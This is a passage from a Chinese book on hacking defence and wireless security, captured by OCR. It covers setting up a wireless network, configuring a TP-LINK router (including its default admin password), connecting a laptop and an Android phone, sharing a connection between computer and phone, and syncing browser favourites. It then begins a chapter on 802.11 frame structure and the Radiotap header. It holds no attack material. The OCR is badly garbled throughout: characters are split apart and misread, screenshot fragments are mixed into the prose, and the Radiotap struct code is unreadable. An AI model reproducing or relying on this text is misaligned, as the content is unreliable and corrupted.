常见 的 无 线 网 络 设备 就 是 一 个 无 线路 由 
器 ， 那 么 在 这 个 无 线路 由 器 的 电波 覆盖 的 
有 效 范 围 内 ， 都 可 以 采用 WiFi 连 接 方式 进 
行 联网 ， 如 果 无 线路 由 器 连接 了 一 条 ADSL 
线路 或 者 别 的 上 网 线路 ， 则 无 线路 由 器 又 
可 以 被 称 为 一 个 “热点 ”。 


5.2 ”组 建 一 个 简单 的 无 线 网 络 


无 线 局 域 网 络 的 搭建 给 无 线 办 公布 来 
了 很 多 方便 ， 而 且 可 随意 改变 办 公 位 置 而 
不 受 束缚 ， 大 大 适合 了 现代 人 的 追求 。 


5.2.1 搭建 无 线 网 环境 


有 线 网 络 到 户 后 ， 用 户 只 须 连 接 一 个 具有 


无 线 WiFi 功 能 的 路 由 器 ， 然 后 各 房间 里 的 
计算 机 、 笔 记 本 计算 机 、 手 机 和 iPad 等 设 
备 利 用 无 线 网 卡 与 路 由 融 之 间 建 立 无 线 连 
接 ， 即 可 构建 整个 办 公 室 的 内 部 无 线 局 域 
网 ， 下 图 为 一 个 无 线 局 域 网 连接 示意 图 。 


ADSL/CABEL 


4 


国 ， 


安装 无 线 网 卡 的 
笔记 本 计算 机 一 


外 | 
二 


G 
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组 建 无 线 安全 网 络 = 


黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


"a (本 
"Ek 

“下 1 fm 

四 一 J 


spi 5.2.2 ”配置 无 线 局 域 网 


建立 无 线 局 域 网 的 第 一 步 就 是 配置 无 


线路 由 器 ， 默 认 情况 下 ， 具 有 无 线 功 能 的 


路 由 器 不 开局 无 线 功 能 ， 需 要 用 户 手动 配 
置 ， 在 开启 了 路 由 器 的 无 线 功 能 后 ， 下 面 
就 可 以 配置 无 线 网 了 。 

使 用 计算 机 配置 无 线 网 的 操作 步 又 
如 下 。 
[step 图 打开 IE 浏 览 器 ， 在 地 址 栏 中 输入 路 
由 器 的 网 址 ， 一 般 情 况 下 路 由 器 的 默认 
网 址 为 “192.168.0.1”， 输 入 完毕 后 单 去 
“ 转 至 ”按钮 ， 即 可 打开 路 由 器 的 登录 窗 
口 ， 如 下 图 所 示 。 


回 TL-WRBS85N 


X 上 中间 
二 Se | 192.158.01 


TP-LINIK 


博 输 入 管理 员 密 码 


stp 图 在 “请 输入 管理 员 密 码 ” 文 本 框 中 输 
入 管理 员 的 密码 ， 软 认 情 况 下 管理 员 的 密 
码 为 “123456”， 如 下 图 所 示 。 

x 区 

€ > ©O | wo 


加 TL-WR885N 


上 -LE 


清 输 入 管理 员 密 码 
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单 击 “确认 ”按钮 ， 即 可 进入 路 由 器 
的 “运行 状态 ”工作 界面 ， 在 其 中 可 以 查 
看 路 由 器 的 基本 信息 ， 如 下 图 所 示 。 


BB TLWR885N 


x 有 和 
fr | 19216601 


当前 术 件 版 本 : 1.0.2 Build 1 
当前 酸 件 瞩 本 wR355X 


项 ， 在 打开 的 子 选 项 中 选择 “基本 信息 ” 
选项 ， 即 可 在 右 侧 的 窗 格 中 显示 无 线 设置 
的 基本 功能 ， 并 选中 “开始 无 线 功能 ”和 
“开局 SSID 广 播 ” 复 选 框 ， 如 下 图 所 示 。 


x 置 


加 TL-WR885N 


< 人 0 


192168.0.1 


由 态 员 


当 开 启 了 路 由 器 的 无 线 功 能 后 ， 单 击 
“保存 ”按钮 进行 保存 ， 然 后 重新 启动 路 
由 器 ， 即 可 完成 无 线 网 的 设置 ,这样 具 有 
WiFi 功 能 的 电子 设备 就 可 以 与 路 由 器 进行 
无 线 连 接 ， 从 而 实现 共享 上 网 。 


5.2.3 ”将 计算 机 接 入 无 线 网 


笔记 本 计算 机 具有 无 线 接 入 功能 ， 台 式 
计算 机 要 想 接 入 无 线 网 ， 需 要 购买 相应 的 无 


线 接收 器 ， 这 里 以 笔记 本 计算 机 为 例 ， 介 绍 
如 何 将 计算 机 接 入 无 线 网 ， 有 具体 的 操作 步骤 
如 下 。 

双击 笔记 本 计算 机 桌面 右 下 角 的 无 
线 连接 图 标 ， 打 开 “ 网 络 和 共享 中 心 ” 窗 
口 ， 在 其 中 可 以 看 到 计算 机 的 网 络 连接 状 
态 ， 如 下 图 所 示 。 


号 网 洛 和 共享 中 心 0 
小 竺 < 网 络 和 Inte.。 网 着 和 共享 中 心 v 站 天 
其 ~ 言 已 fi 计 
生活 本 2] 前 宫 治 动 网 络 
; 汪 配 2 
ee 你 目前 没有 连接 到 任何 网 络 。 
更 效 高 级 共享 没 什 
更 改 网 洛 设 仁 
旧 i， 设 树 亲 的话 接 或 网 索 


设 公 帘 带 、 找 三 或 VPN 连接 ; 或 设置 路 由 其 或 这 入 点 。 


[ 缉 ” 站 本 罕 堆 解 和 
诊 新 并 企 复 网 洛 问 是 ， 或 埋 屯 得 缀 准 解答 信息 . 


Internet 这 项 
Windows 防火 培 


示 工 组 


| 

单 击 笔记 本 计算 机 桌面 右 下 角 的 无 线 
连接 图 标 ， 在 打开 的 界面 中 显示 了 计算 机 
自动 搜索 的 无 线 设 备 和 信号 状态 ， 如 下 图 
所 示 。 


666666 


“和 类 = 


family 
”安全 


fhpre-HSTT 
女生 


TP-LINK1 
2 二 


TP-LINK 6666 
he 内 


安全 


aagOU 


单 击 一 个 无 线 连接 设备 ， 展 开 无 线 
连接 功能 ， 在 其 中 选中 “自动 连接 ” 复 选 
框 ， 单 击 “ 连 接 ” 按 钮 ， 如 下 图 所 示 。 
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ChinaNet-H5TF 


二 


family 


= 
i INK1 
7 白 动 连 近 
| 、 轩 | 


TP-LINK 6666 


一 
> 于 


在 打开 的 界面 中 输入 无 线 连接 设备 的 
连接 窗 码 ， 单 击 “ 下 一 步 ” 按 钮 ， 如 下 图 
所 示 。 


p66666 


ChinaNet-HSTF 
个 一 


family 
TP-LINK1 
输入 网 络 安 全 密 钥 


图 与 我 的 联系 人 共 邓 网 络 


开始 连接 网 络 ， 如 下 图 所 示 。 


TP-LINK1 
% 已 连接 , 安全 


Pa mywifi 


连接 到 网 络 之 后 ， 桌 面 右 下 角 的 无 线 
连接 设备 显示 正常 ， 并 以 弧 线 的 方法 给 出 
信号 的 强 弱 ， 如 下 图 所 示 。 
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二 黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


再 次 打开 村 网 络 和 共享 中 心 2 窗 号 9 je 攻 六 中 国电 信 CB 56% 


在 其 中 可 以 看 到 计算 机 当前 的 连接 状态 ， Hwan 。 
如 下 图 所 示 。 


本 ChinaNet-H5TF 
个 党 < 网 阁 和 .> 网 阁 和 夫 享 中 心 ~ 已。 搜索 控制 面板 p 
Hs i TP-LINK1 8 念 
控制 面板 主页 查看 基本 网 络 信息 并 设置 连接 
查 霹 活动 网 阁 TP-LINK2 8 气 
Ce 访问 堪 型 Internet 
i 和 en 
更 改 高 级 共享 设置 ee 过 六， dl wn TP-LINK_38F156 
TP-LINK_6666 8 亏 
要 改 网 络 设 宫 
i 没 轩 新 的 连接 或 网 络 fhpre-H5TF 
没 辕 完 带 、 抄 号 或 VPN 这 接 ; 或 设置 路 和 由 器 或 接 入 站。 
mywifi 8 会 
| 问题 泛 淮 解答 
诊断 并 修复 网 阁 问题 ， 或 者 获得 疑难 解答 信息 。 © 
舅 请 地 阅 
RE 使 用 手指 点 按 可 用 的 WLAN， 弹 出 连接 
Ey 界面 ， 在 其 中 输入 相关 密码 ， 如 下 图 所 示 。 


人 无 线 局 域 网 配置 完成 后 ， 用 户 可 以 将 i 

手机 接 入 WiFi， 从 而 实现 无 线 上 网 ， 这 里 ..... 
以 Android 系 统 为 例 演示 手机 接 入 WiFi 具 体 
操作 步骤 如 下 。 


回 
在 手机 界面 中 用 手指 点 按 “ 设 置 ” 
图 标 ， 进 入 手机 的 “设置 ” 界面， 如 下 图 Qlwlelrlr|vlu) lole 


日 目 日 日 日 四 上 四 国 
所 示 。 
可 zj|x|clv|elv 医 
下 午 2:44 等 …, 反 中 国电 信 57% 
a 司 1-.T WE 


9 络 壬 点 按 “ 连 接 ” 按 钮 ， 即 可 将 手机 接 入 

人 @@ 移动 网 络 WiFi， 并 在 下 方 显示 “已 连接 ”字样 ， 这 

i 样 手 机 就 接 入 了 WiFi， 然 后 就 可 以 使 用 手 
机 进行 上 网 了 ， 如 下 图 所 示 。 


人 蓝牙 已 关闭 

下 午 2:45 9.52Kls 总 亏 六 有 中 国电 信 Ci 56% 
四 ”其 他 连接 方式 WLAN 

开启 WLAN 入 
@ 通知 和 状态 栏 

TP-LINKI1 了 
个 壁纸 
人 @ 个 性 主题 

ChinaNet-H5TF 中 去 
人 @@ 字体 默认 TP-LINK2 8 
[EN 坛 业 fhpre-H5TF a 


使 用 于 指 点 按 WLAN 右 侧 的 已 关 mywifi 8 会 
闭 ”， 开 局 手机 WLAN 功 能 ， 并 自动 搜索 ee 
周围 可 用 的 WLAN， 如 下 图 所 示 。 © 
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5.3 “计算 机 和 手机 共享 无 线 上 网 


随 痢 手机 上 网 的 普及 ， 计 算 机 和 手机 的 
网 络 是 可 以 互相 共享 的 ， 这 在 一 定 程度 上 方 
便 了 用 户 ， 例 如 ， 如 果 手 机 共享 计算 机 的 网 
络 ， 则 可 以 节省 手机 上 网 产生 的 流量 费用 ; 
如 果 目 己 的 计算 机 不 在 有 线 网 络 环境 中 ， 则 
可 以 利用 手机 的 流量 进行 计算 机 上 网 。 


5.3.1 手机 共享 计算 机 的 网 络 


计算 机 和 手机 网 络 的 共享 需要 借助 
第 三 方 软件 ， 这 样 可 以 使 整个 操作 简单 
方便 ， 这 里 以 借助 “360 免 费 WiFi” 软 件 
为 例 进行 介绍 。 
将 计算 机 接 入 WiFi 环 境 当 中 ， 如 下 图 
所 示 。 


党 网 络 和 共享 中 心 - 口 x 
个 葡 * 网络 和 .，， 网 洛 和 注 训 十 心 v 已 探索 控制 丙 板 5 
查看 其 本 网 络 信息 并 设置 连 
0 查看 基本 网 络 信息 并 设置 连接 
理 知 洁 动 网 治 
于 次 言 相关 京 识 宇 TP-LINK1 访问 类 型 ; Internet 
公用 网 洛 这 接 : :WLAN 
二 [TP-LINKT) 
更改 网 将 设 号 
二 设 豆 新 的 迹 接 或 网 净 
设 吾 帝 击 ， 拔 三 或 VPN 这 投 ; 或 设 诗 路 二 这 或 忆 入 点 ， 
囊 | 问 于 认 淮 办 符 
诊 厅 并 修复 网 洛 问题 ， 或 才 获 得 疑 淮 艇 答 信息 。 
Internet 鞍 巧 
Windows 防火 坛 
京 库 组 


在 计算 机 中 安装 “360 免 费 WiFi” 
WiFiI 名 称 与 客 码 ， 如 下 图 所 示 。 


习 已 口 免 玉 WiFi 


安全 防护 中 


WiFi 已 开启 ， 快 拿手 机 连 幸 吧 


WiFi 名 称 : LB-LINKI1 


WiFi 密 码 : 66396639 和 度 荡 密码 
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打开 手机 的 WLAN 搜 索 功 能 ， 可 以 看 
到 搜索 出 来 的 WiFi 名 称 ， 如 这 里 是 LB- 
LINK1， 如 下 图 所 示 。 


.=m 


TP-LINKI 
t 了 筷 1 


LB-LINK 1 


TP-LINK_99DA 


MERCURY_42952A 


使 用 手指 点 按 LB-LINK1， 即 可 打开 
WiFi 连 接 界 面 ， 在 其 中 输入 密码 ， 如 下 图 
所 示 。 


强 


WPA2 PSK 


点 按 “连接” 按钮 ， 手 机 就 可 以 通过 
计算 机 发 射出 来 的 WiFi 信 号 进行 上 网 了 ， 
如 下 图 所 示 。 


LB-LINKIT 


mywifi 
可 用 


TP-LINK_99DA 


TP-LINK_6666 
用 了 
bbbbbb 
用 


ChinaNet-GTY7 


ChinaNet-JCPb 
,4 NPAAMNPA? 志 行人 保 提 


许可 用 


Tenda_1BF8FD0 
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黑客 攻防 与 无 线 妇 全 从 新 手 到 高 手 ( 超 值 版 ) 


返回 到 计算 机 工作 环境 当中 ， 在 
“360 免 费 WiFi” 的 工作 界面 中 选择 “已 经 
连接 的 手机 ”选项 卡 ， 则 可 以 在 打开 的 界 
面 中 查看 通过 此 计算 机 上 网 的 手机 信息 ， 
如 下 图 所 示 。 

| acommvr 日 >-x 


1 台 手 机 安全 上 网 中 ， 无 人 路 网 


| 月 华为 C8815 
So 0.00KB/s 


国 发 文字 39 装 软件 e 


ES 玩 游戏 


:三 已 连接 的 手机 


计算 机 共享 手机 的 网 络 


训 手机 可 以 共享 计算 机 的 网 络 ， 计 算 机 也 可 

以 共享 手机 的 网 络 ， 这 里 以 Android 手 机 为 例 
演示 手机 共享 网 络 ， 具 体 的 操作 步骤 如 下 。 
打开 手机 ， 进 入 手机 的 设置 界面 ， 
在 其 中 使 用 手指 点 按 “ 人 便携式 WLAN 热 
点 ”， 开 局 手 机 的 便携 式 WLAN 热 点 功 
能 ， 如 下 图 所 示 。 


便携 式 WLAN 热点 
本 找 式 热点 HUAWEI C8815 已 启 


[seep 图 返回 到 计算 机 的 操作 界面 ， 单 击 右 
下 角 的 无 线 连接 图 标 ， 在 打开 的 界面 中 显 
示 了 计算 机 自动 搜索 的 无 线 设备 和 信号 状 
态 ， 这 里 就 可 以 看 到 手机 的 无 线 设备 信息 
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“HUAWEI C8815”， 如 下 图 所 示 。 


TP-LINKI1 


已 连 


bp 大 Pe 
WC = > = 


= HUAWEFI C8815 
” 开放 


广 
队 
666666 
” 安全 


单 击 手 机 无 线 设 备 ， 即 可 打开 其 连接 
界面 ， 如 下 图 所 示 。 


ft TUNKL 


二 ， 巡 于 
9 C 
/fF i .8815 


其 他 人 可 能 全 看 到 你 盏 过 | 此 网 禾 发 送 的 信息 
图 自动 革 
连接 展 


单 击 “连接 ” 按 钮 ， 将 计算 机 通过 手 
机 设备 连接 网 络 ， 如 下 图 所 示 。 


HUAWE| C8815 


正在 连接 


[step 轿 连接 成 功 后 ， 在 手机 设备 下 方 显示 
“已 连接 ， 开 放 ” 信 息 ， 其 中 的 “开放 ” 
表示 该 手机 设备 没有 进行 加 密 处 理 ， 如 下 
图 所 示 。 


= HUAWEI C8815 
”已 连接 ， 开放 


TP-LINKI1 


cs 


666666 


( 侈 提示 : 至 此 ， 就 完成 了 计算 机 通过 手机 


上 网 的 操作 ， 这 里 需要 注意 的 是 一 定 要 时 
刻 关 注 手 机 的 上 网 流量 。 


实战 演练 


实战 演练 1 一 一 加 密 手机 的 WLAN 热 点 
功能 
为 保证 手机 的 安全 ， 一 般 需 要 给 手机 


5.4 
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的 WLAN 热 点 功能 添加 密码 ， 具 体 的 操作 
又 如 下 。 输入 网 络 安全 窗 铀 

在 手机 的 移动 热点 设置 界面 中 ， 点 按 WE 
ee 点 ”功能 ， 在 弹出 的 界面 

中 点 按 “ 开 放 ” 选 项 ， 可 以 选择 手机 设备 
的 加 窗 方 式 ， 如 下 图 所 示 。 


/后 ri C8815 


下 一 步 取消 


实战 演练 2 一 一 将 计算 机 收藏 夹 网 址 同步 
到 手机 


使 用 360 安 全 浏览 器 可 以 将 计算 机 收藏 
夹 中 的 网 址 同步 到 手机 当中 ， 其 中 360 安 全 
浏览 器 的 版 本 要 求 在 7.0 以 上 ， 具 体 的 操作 
haa 


络 Ssir 在 计算 机 中 打开 360 安 全 浏览 器 8.1， 
HUAWEIC8815 ee 图 所 了 了 


0 安 合演 | 丙 话 8 专 耕 总 工具 丰 助 | 难 一 | 口 
开放 ss es 
C 全 1360 和 导航 开 | 名 https 360.cn BS v|Q. Q 
~ 口 手机 要 襄 夫 门 谷 王 大 网 二 大 全 网 游戏 中 心 站 Links 有 扩展 登录 管 灾 
Il》 | 凶 | 口 甘于 让 记 | 入 360S% 新 一 代 去 全 上 网 导航 + ie 
WPA PSK i 
设 360 写 站 为 主 记 合 NN 
WPA2 PSK 二 后 rn 仇 宁 (w,) 全 脐 -3~-20°C 地 明 了 晴 
刁 已 口 村 ) | b [ 切 械 ] 天 持 笠 风 回 :说 内 -2~-19°C 


新 闻 视频 ” 同 片 ” 育 乐 ”向 性” 地图” 则 管 


Google 


、 新 更 地 税 ” 花 益 ”电视 底座 ”淘宝 。 英 妆 ”百度 商 乐 ”再度 去 

step sw rr ~ > ~ 一 

选择 好 加 站 万 式 后 7 Ep 可 在 下 万 显示 帮 我 的 主页 | 工 新 闻 头 条 ， 迎 电视 剧 ” 国 最 新 电影 ”网 小 游戏 。 肯 小 说 大 

窜 码 输入 框 ， 在 其 i 输入 答 码 ， 然 后 单 去 园 新 间 ,视频 ”人 @ 电影 ,电视剧 ， 好 挡 * 360 商 域 。。 新浪. 向 情 。” 痢 天 痢 . 情 过 
. 保存 ”按钮 Pp 可 ， 如 下 图 所 7 局 风物- 海光” @ 彩 垩 , 理 叶 360 游 戏 淘宝 网 网 上 购物 


全 活 央 . 其 全 中 小 识 ， 访 游 向 宝 避 360 呈 和 寞 聂 划 四 
4 
人 0) 今日 直 注 ” 口 莹 研 浏 总。 册 交加 时 村 J 下载 书包 口 41) 


单 击 工作 界面 左上 和 角 的 浏览 器 标志 ， 
A 
如 下 图 所 示 。 


网 绝 SS II 六 性 ” 诗 吾 笋 莹 工具 和 大助 曾 一口 x* 
5s 360.cn 各 多 亦 心 . Q 
HUAWEIC8815 © 2 
未 登录 人 游戏 中 心 站 Link 目 让 扩展 > 登录 管家 
全 | 全 上 网 导航 x | 十 es 
WPA PSK Ss 
会 N 
一 这 S PF - ~ 量 20°C 明 8 
医 和 > (w) t 持 深 风向 : 说 风 四 
签 扣 泊 英 中 心 


补 逆 ”视频 ”同志 ” 育 乐 ” 宾 性 ” 圳 图 ”I6 管 


i 


寻 ”人 雍 各 ”电视 后 座 ”淘宝 瑞 关 ”再度 疝 所 ” 青 度 去 


防 的 这 流 
1 : 回 最 新 电影 网 小 游戏 天 小 说 大 : 
ET ae re 
而 税 下 淘 洛 一 0 彩 学 地 叮 :60 诺 水 淘宝 半 网 上 购物 
EY 1. 各 宇 el He Es 
合 活 其 -基金 ”加 小 说 ,旅游 de O3508n 票 出 久 
4 
今 (全 今日 直 挤 。 口 甘于 浏 吉 了 交加 渤 案 J 下载 天 各 虽 4》 


加 密 完成 后 ， 使 用 计算 机 连接 手机 设 二 
Fy 系统 提示 用 户 输入 网 络 安全 密 钥 ， 弹出 “登录 360 账 号 ”对 话 框 ， 在 其 
如 下 图 所 示 。 re 客 码 ， 如 下 图 所 示 。 


360 支 全 浏览 如 8.1 
和 < 心中 


黑客 攻防 与 无 线 受 全 从 新 手 到 高 手 ( 超 值 版 ) 


> 文件 查看 收藏 工具 帮助 || 一 | 口 | X 


已 .猴子 换 头 Q 


你 站 本 ~ 口 一 登录 360 帐 号 [| 上- 同 登 录 千 和 
DIO | 网 
设 350 导 航 为 主页 国 -- Pe … 国 
刁 已 口 LU + 

i - - - 


傅 我 的 主页 | 图 


百度 音乐 ”百度 云 


J 记 住 窟 码 襄 记 密码 ? 姑 小 襄 大 4 
大 鸣 物 :海沟 网 上 购物 
你 还 没有 360 帐 三 ) 尘 莫 注册 
个 活期 .基金 时 紧 划 可 ~ 
ae 上 
音 今 他 今日 直 瑚 口 蘑 异 人生 多 各 加 J 下 载 书 名 DD 4) Ql1oo6 .: 


侈 提示 : 如 果 没 有 账号 ， 则 可 以 单 击 “ 免 


费 注册 ”按钮 ， 


在 打开 的 界面 中 输入 账号 


与 密码 进行 注册 操作 。 


免费 注册 360 帐 号 


[step 园 输入 完毕 后 ， 单 击 “ 登 录 ” 按 钮 ， 

即 可 以 会 员 的 方式 登录 到 360 安 全 浏览 器 当 
中 ， 单 击 浏览 器 左上 角 的 图 标 ， 在 弹出 的 
下 拉 列 表 中 单 击 “手动 同步 ”按钮 ， 如 下 


图 所 示 。 


于 动 同步 
让 


@ 活期 .基金 因 小 说 .旅游 


前 今日 名 今日 寺 局 。 日 壬 异 济 信 
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‘© F 
局 ! 


答 引 和 注 奖 个 人 中 
区 PP 
积分 彦 二 我 的 笋 蕊 


遂 测 二 示 


[RE 


》 文件 查看 收 若 TIR 帮助 | 曾 一 口 X 
襄 乡 vv 名 . 钱 子 搞 头 名 
串 扩 层 ” 同 登 录 管家 


ps; hao.360.cn 

玖 六 邓 书 心 问 Unks 分 

全 上 RS 及 x | 十 [= 
但 Rl 


np 国 :: 
无 持 尝 内 可: 币 风 2—19°C 


新 闻 视频 网 音乐 宜 博 圳 图 f 答 1 


世 我 花 全 ”电视 车 座 ”淘宝 英 朗 百度 将由 百度 云 盘 


| : 国 最 新 电影 ”网 小 游戏 :本 小 培 大 全 
，360 商 城 新 沪 :向 博 峰 到 洛 : 靖 先 

860 游戏 淘宝 网 网 上 购物 

爱 淘 宝 © 350BS 视 聚 划算 本 


» 


所 驳 加 蒜 器 VW 下载 巴 钻 0 4 QQ100% .: 


$4 哺 -3~-20"C 


无 持 痉 民 问 : 襟 风 


二 A 
三 1b. 加 
am | 


@ . 
-2~—19°C 


此 时 ， 可 将 计算 机 中 的 收藏 天 进行 同 
步 操作 ， 如 下 图 所 示 。 


》 文件 查 吾 必 佑 I 加 助 | 首 一口 XX 
(ay ps://hao.360.cn 信 乡 v | Q. 点 此 搜索 Q 
[| 殉 凑 戏 宁 心 癌 Links 转 360 去 全 吕 扩 展 ” , 同 登 录 管 家 
3 w We 尼 
跨 屏 浏览 我 的 帐号 | | CD 2 
会 N 


| 新 闻 初 丘 网 H 音乐 沿 情 地 图 问答 购物 机票 


烛 税 ” 花 盆 ”电视 底座 ” 淘 支 ” 英 郎 百 应 音 乐 。 百 应 云 盘 胎 识 时 尚 
积分 遍 城 我 的 次 藻 
中 ; 回 最 新 电影 ”98 小 游戏 ; 上 小 说 大 全 ” 恰 旅游 度 
退出 登录 i ， 360 商城 新 浪 ， 御 博 网 天 澳 * 将 先 皖 浙 ， 袖 所 
请 风 和 入?E 一 江宁 7 捏 杂 5660 游戏 淘宝 网 网 上 购物 百度 . 热 技 
会 活期 .基金 ”加 小 地 .旅游 爱 淘 主 @ 3608 负 聚 划算 国美 在 线 
车 生 58 |o 太平 洋 电 阁 2 人 广 写 
四 涝 减 - 小 游戏 个 动漫 . 自 播 秀 京东 商城 58 同 城 太平 洋 电 阅 世纪 性 灌 
3 搞笑 .部 瞎 坟 教育. 度假 汽车 之 家 易 车 网 本 平 洋 汽车 实 居 宪 
heh 化 , 
Q 考 询 . 旺 座 。 唤 机 票 . 火 丰 村 驯 妈 提 诺 汶 信 民 ， 町 化 赶集 网 当当 网 属 
苟 仿 日 特卖 。 友好 搜 } (6) 今日 直 看 。 口 跨 屏 洲 谢 后 疯 jm 下载 巴 必 口 串 QQ10% .: 


进入 手机 操作 环境 当中 ， 点 按 “360 
手机 浏览 器 ”图 标 ， 进 入 手机 360 浏 览 器 工 
作 界 面 ， 如 下 图 所 示 。 


搜索 或 输入 网 址 


选择 城市 


@ 搜索 关键 词 


关 
新 闻 视频 美 图 


新 浪 ”图 搜狐 ” 国 同城 
国 好 药 


[加 | 好 搜 


四 百度 国 京 东 


淘宝 乐 居 


图 赴 集 。 喇叭 中 会 ”了 周 搜 房 网 


“最 常 访问 


奢 360 个 人 中 心 - 找 回 


守 360 手 机 抢 票 


© 和 


[step 回 点 按 页 面 下 方 的 “一 ”按钮 ， 打 开 
手机 360 浏 览 器 的 设置 界面 ， 如 下 图 所 示 。 


第 5 章 ”组 建 无 线 安 全 网 络 


2、 上 蛤 入 用 户 名 /手机 号 /邮箱 
中 输入 密码 
快速 注册 
人 局 vv (') 
设置 。 ”电脑 信息 。 ” 下载 退出 Eu 
= 全 [step 罗 在 登录 界面 输入 账号 与 密码 ， 这 里 需 


要 注意 的 是 ， 手 机 登录 的 账号 与 密码 与 计 
ES 图 点 按 “ 收 藏 天 ”图 标 ， 进 入 手机 360 ， 算 机 登录 的 账号 与 密码 必须 一 致 ， 如 下 图 
浏览 器 的 “收藏 夹 ” 界 面 ， 如 下 图 所 示 。 


收藏 来 ‘DD) 


AS 


De 


没有 收藏 记录 


编辑 同步 单 击 “立即 登录 ”按钮 ， 即 可 以 会 


, 员 的 身份 登录 到 手机 360 浏 览 器 当中 ， 在 打 
点 按 “同步 ” 按钮 ， 打开 “账号 登 开 的 界面 中 可 以 看 到 “计算 机 收藏 夹 ” 选 
录 ” 界 面 ， 如 下 图 所 示 。 项 ， 如 下 图 所 示 。 
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二， 黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 〈《 超 值 版 ) 


编辑 同步 


点 按 “ 计 算 机 收藏 来 ”选项 ， 即 可 打 
开 “ 计 算 机 收藏 来” 操作 界面 ， 在 其 中 可 
以 看 到 计算 机 中 的 收藏 夹 的 网 址 信息 出 现 
在 手机 浏览 器 的 收藏 夹 当 中 ， 这 就 说 明 收 
藏 夹 网 址 同步 完成 ， 如 右 图 所 示 。 
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3 


电脑 收藏 夹 


小 试 身 手 


练习 1: 
练习 2: 
练习 3: 
练习 4: 


组 建 一 个 简单 的 无 线 网 络 。 
将 手机 接 入 无 线 WiFi。 

手机 共享 计算 机 网 络 上 网 。 
计算 机 共享 手机 网 络 上 网 。 


第 6 草 ”数据 帧 的 结构 与 加 密 原 理 


无 线 通信 中 ， 所 有 的 数据 都 是 通过 无 线 设 备 传 送 数 据 帧 完成 的 ， 所 以 学 习 无 线 数 据 帧 的 
结构 以 及 无 线 通 信 的 加 密 原 理 ， 是 提高 无 线 安全 的 基础 。 本 草 介绍 无 线 网 络 数 据 帧 的 结构 与 
无 线 通信 的 加 窖 原理， 主要 包括 数据 帧 、 控 制 帧 、 管 理 帧 的 结构 以 及 无 线 通信 的 加 密 原 理 。 


6.1 数据 帧 


6.1.1 数据 帧 的 结构 


无 线 数 据 帧 的 结构 比较 复杂 ， 包 含 
了 很 多 数据 信息 ， 其 中 Radiotap 头 与 IEEE 
802.11 协 议 头 是 数据 帧 中 的 头 信息 ， 下 面 进 
行 详 细 介 绍 。 


1. Radiotap 头 


Radiotap 头 是 802.11 帧 注入 和 接收 的 事 
实 标准 ， 所 以 在 研究 无 线 数据 帧 之 前 有 必 
要 了 解 一 下 Radiotap 头 。 

Radiotap 头 包含 了 信号 强度 、 噪 声 强 
度 、 信 道 、 时 间 玲 等 信息 。Radiotap 比 传 
统 的 Prism 或 AVS 头 更 有 灵活 性 ， 文 持 Ra- 
diotap 的 系统 较 多 ， 如 Linux、FreeBSD、 
NetBSD、OpenBSD， 还 有 Windows( 需 使 
用 AirPcap) ， 厂 家 可 以 根据 自己 的 需要 定 
制 个 性 化 信息 ， 因 此 它 的 长 度 不 固定 。 

Radiotap 的 头 部 定义 如 下 : 


SETUCLE LeeekEoOxJlL radiotap header 


ETLRERETEE Tt VerSgLOny 

ree ED 0 
I it pads 
了 下 下 下 让 TE lens 

/* entire length */ 
no int32 Et iL DCESents 


/* fields present */ 
Te TSREDSCKReee 


主要 参数 介绍 如 下 : 

(1) it _ version。 表 示 版 本 号 ， 值 始终 
为 0。 

(2) it pad。 没 有 任何 使 用 价值 ， 仅 仅 
是 为 了 结构 体 对 齐 。 


(3) it len。 表 示 长 度 ， 包 括 了 Radio- 
tap 头 部 和 数据 两 部 分 ， 如 果 对 Radiotap 信 


恩 不 关心 ， 通 过 该 长 度 计 算 可 以 直接 跳 到 a 


IEEE 802.11 头 部 。 


(4) it present。 表示 Radiotap 数据 的 


位 掩 码 。Radiotap 的 数据 紧 跟 其 头 部 ， 当 其 
中 的 位 掩 码 为 tue 时 ， 表 示 有 对 应 的 数据 ， 
可 以 认为 每 一 比特 表示 一 种 类 型 。 比 如 bit5 
为 1 表示 有 通道 数据 ， 则 可 以 获取 到 信号 
强度 ， 反 之 是 没有 对 应 的 数据 。 因 此 ，Ra- 
diotap 的 长 度 其 实 是 不 固定 的 。 

Radiotap 头 通过 抓 包 软 件 抓 出 来 的 信 
轧 ， 如 下 图 所 示 。 


» Frame 11: 34 bytes on wire (272 bits}, 34 bytes captured (272 bits) on interface 6 
- Radiotap Header vg, Lenoth 24 
Header revision: © 
Header pad: © 
Header length: 24 
~ Present flags 
» Present flags word; Gxad00402e 
» Present flags word: Gx080008820 
» Flags:; Ox 


Data Rate: y Mb/ 
channel frequency: 2412 [BG 1] 
» Channel flags: Bxe8aB, Complementary Code Keying {CCK), 2 GHz Spectrum 
Antenna signal: -41dBm 
» RX flags: exeBep 
Ancenna Signal: 
Antenna: 日 
» 882.11 radio information 
» IEEE 862.11 Clear-to-send, Flags: 


-4105m 


ne 


Present flags 是 一 个 32 位 的 标记 ， 下 图 
为 具体 信息 。 


~ Present TIags 
- Present flags word: 9xapo96402e 
a nl A g = TSFT: Absent 
.... 。..1. = Flags: Present 
sent 
Ey 1... = Channel: Present 
= FHSS: Absent 
.1 = dBm Antenna Signal: Present 
ap Sams oo oess ea ase ai ona SS UE ANtenna Nolses AbGert 
oa ole ean QQ... .... = Lock Quality: Absent 
. .0 .... ...-.=TX Atenuation: Absent 
,vB ,= UB TX Attenuation; Absent 
.. .0.. .... .... = dBm TX Power: Absent 
Atenna: Musent 
和 2 = dB Antenna Signal: Absent 
0 = UB Antenna Noise: Absent 
sw sles soms san eee SS WI Tlags: Present 
nnels Abeont 
Beedlea eye B... = MCS information: Absent 
和 坟 六 。 站 手 首 疝 他 痢 OO = A-MPDU Status: Absent 
,9 .vv es = VHT information: Absent 
see oa eo sos os oon ss so5 三 frame tinestemm: Absent 
A Qu es = HE information: Absent 
eS = HE-MU information: Absent 
aasseole a os es ae = Reserved: QOxQ 
‘ls a . = Radiotap NS next: True 
Ou es es os es = Vendor NS next: False 
a = Ext: Present 
» Present flags word: OxO0000820 


二 黑客 攻防 与 无 线 巡 全 从 新 手 到 高 手 ( 超 值 版 ) 


其 中 ，Present flags 数 据 信息 中 的 Tsft 表 
示 数 据 掩 码 ， 当 Ext 标 记 为 1， 表 明 后 面 还 有 
一 个 flags 的 数据 ， 直 至 最 后 一 个 Present， 当 
Ext 标 记 为 0， 表 示 结 束 Present 的 数据 。 


2. IEEE 802.11 协 议 头 


